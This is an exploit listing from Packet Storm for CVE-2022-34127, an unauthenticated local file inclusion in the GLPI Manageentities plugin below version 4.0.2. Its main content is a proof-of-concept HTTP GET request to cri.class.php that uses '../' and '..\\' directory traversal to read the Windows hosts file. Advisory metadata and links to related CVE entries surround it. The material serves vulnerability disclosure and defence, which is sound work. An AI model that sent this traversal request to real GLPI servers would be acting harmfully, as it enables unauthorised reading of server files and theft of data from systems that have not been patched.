Lucene search
Nuri CilengirPACKETSTORM:171653HistoryApr 03, 2023 - 12:00 a.m.
GLPI Manageentities Local File Inclusion
2023-04-0300:00:00
Nuri Cilengir
packetstormsecurity.com
121
glpi
manageentities
local file inclusion
unauthenticated
cve-2022-34127
ubuntu 22.04
nuri Γ§ilengir
pentest
windows system32 hosts file
0.021 Low
EPSS
Percentile
89.2%
`# ADVISORY INFORMATION
# Exploit Title: GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin
# Date of found: 11 Jun 2022
# Application: GLPI Manageentities < 4.0.2
# Author: Nuri Γilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/InfotelGLPI/manageentities
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-34127
# PoC
GET /marketplace/manageentities/inc/cri.class.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
`
Related
prion
prion
Directory traversal
2023-04-16 03:15:00
cvelist
cvelist
CVE-2022-34127
2023-04-16 00:00:00
osv
osv
CVE-2022-34127
2023-04-16 03:15:07
zdt
zdt
nvd
nvd
CVE-2022-34127
2023-04-16 03:15:07
cve
cve
CVE-2022-34127
2023-04-16 03:15:07
exploitdb
exploitdb
GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin
2023-04-03 00:00:00